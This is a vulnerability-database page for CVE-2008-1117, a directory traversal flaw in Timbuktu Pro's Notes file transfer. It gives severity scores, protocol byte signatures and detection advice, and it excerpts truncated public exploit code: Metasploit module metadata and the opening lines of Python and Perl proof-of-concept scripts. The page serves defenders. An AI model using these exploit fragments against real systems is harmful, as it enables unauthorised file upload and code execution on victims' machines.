CVE-2008-1117
published 2008-03-14CVE-2008-1117: Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7…
PriorityP260critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
69.47%
99.3th percentile
Directory traversal vulnerability in the Notes (aka Flash Notes or instant messages) feature in tb2ftp.dll in Timbuktu Pro 8.6.5 for Windows, and possibly 8.7 for Mac OS X, allows remote attackers to upload files to arbitrary locations via a destination filename with a \ (backslash) character followed by ../ (dot dot slash) sequences. NOTE: this can be leveraged for code execution by writing to a Startup folder. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2007-4220.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netopia | timbuktu_pro | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x01\x60\x00\x00\x52\x00\x25\x00\x22\x02\x01\x00\x04\x03\x07\x00\x05\x00\x01\x00\x00\x00\xf1
bytes↗
\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B
bytes↗
\xFB\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xC2\x32\x94
bytes↗
\xfb\x00\x00\x00\x00BINAmdos\xc2\x12\x49\xaf\xbd\x35\xac\x98
- →Monitor TCP/407 for the Timbuktu Pro Notes protocol handshake byte sequences (0x00 0x01 0x60/0x61/0x62/0x6B opcodes) as indicators of exploit attempts. ↗
- →Alert on file creation events in Windows Startup folders (e.g., 'Documents and Settings\All Users\Start Menu\Programs\Startup\') by the Timbuktu Pro process, as exploitation leverages this for code execution. ↗
- →Inspect Timbuktu Pro Notes attachment-info packets (starting with 0xFB) on TCP/407 for filename fields containing path traversal sequences ('../' or '..\'). The attach_info packet embeds the destination filename as a Pascal-style length-prefixed string. ↗
- →Log injection: monitor Timbuktu Pro log files for CRLF (\r\n) sequences embedded in peer hostname or username fields, indicating log-forging attempts via the Notes peer-info exchange packet. ↗
- ·This vulnerability is reported as an incomplete fix for CVE-2007-4220; environments that applied the prior patch may still be vulnerable. ↗
- ·The vulnerability affects both Windows (8.6.5) and possibly Mac OS X (8.7); detections focused solely on Windows tb2ftp.dll may miss Mac OS X exposure. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)
exploitdb·2010-11-24
CVE-2008-1117 Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)
Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit)
---
##
# $Id: timbuktu_fileupload.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Timbuktu Pro Directory Traversal/File Upload',
'Description' => %q{
This module exploits a directory traversal vulnerablity in Motorola's
Timbuktu Pro for Windows 8.6.5.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2008-1117' ],
[ 'OSVDB', '43544' ],
],
'Privileged' => true,
Exploit-DB
Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection
exploitdb·2008-03-11
CVE-2008-1118 Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection
Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection
---
# Core Security Technologies - CoreLabs Advisory
# http://www.coresecurity.com/corelabs
# Title: Timbuktu Pro Remote Path Traversal and Log Injection
# Advisory ID: CORE-2008-0204
# Advisory URL: http://www.coresecurity.com/?action=item&id=2166
# Date published: 2008-03-11
# Date of last update: 2008-03-11
# Vendors contacted: Motorola
# Release mode: Forced release
# Proof of concept code follows. This PoC allows a remote attacker to
# upload a file to an arbitrary location on the victim's machine and forge
# peer information on the log lines of the victim's application.
from sys import argv
from socket import *
from struct import pack
#from utils import printFormatted
#from time import sleep
init_send_op_pac
Exploit-DB
Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation
exploitdb·2008-03-11
CVE-2008-1117 Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation
Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation
---
#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro new(
Proto => tcp,
PeerAddr => $dest,
PeerPort => $port,
Timeout => 1) or print "[-] Error: Could not establish a
connection to $dest:$port\n" and exit;
return $remote;
}
}
sub promptUser {
local($promptString,$defaultValue) = @_;
if ($defaultValue) {
print $promptString, "[", $defaultValue, "]: ";
} else {
print $promptString, ": ";
}
$| = 1; # force a flush after our print
$_ = ; # get the input from STDIN
chomp;
if ("$defaultValue") {
return $_ ? $_ : $defaultValue; # return $_ if it has a value
} else {
return $_;
}
}
# milw0rm.com [2007-09-25]
# milw0rm.com [2008-03-11]
Metasploit
Timbuktu Pro Directory Traversal/File Upload
metasploit
Timbuktu Pro Directory Traversal/File Upload
Timbuktu Pro Directory Traversal/File Upload
This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5.
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/timbuto-adv.txthttp://aluigi.org/poc/timbuto.ziphttp://secunia.com/advisories/29316http://securityreason.com/securityalert/3741http://www.coresecurity.com/?action=item&id=2166http://www.securityfocus.com/archive/1/489360/100/0/threadedhttp://www.securityfocus.com/archive/1/489382/100/0/threadedhttp://www.securityfocus.com/archive/1/489414/100/0/threadedhttp://www.securityfocus.com/bid/28081http://www.vupen.com/english/advisories/2008/0840https://www.exploit-db.com/exploits/4455https://www.exploit-db.com/exploits/5238http://aluigi.altervista.org/adv/timbuto-adv.txthttp://aluigi.org/poc/timbuto.ziphttp://secunia.com/advisories/29316http://securityreason.com/securityalert/3741http://www.coresecurity.com/?action=item&id=2166http://www.securityfocus.com/archive/1/489360/100/0/threadedhttp://www.securityfocus.com/archive/1/489382/100/0/threadedhttp://www.securityfocus.com/archive/1/489414/100/0/threadedhttp://www.securityfocus.com/bid/28081http://www.vupen.com/english/advisories/2008/0840https://www.exploit-db.com/exploits/4455https://www.exploit-db.com/exploits/5238
2008-03-14
Published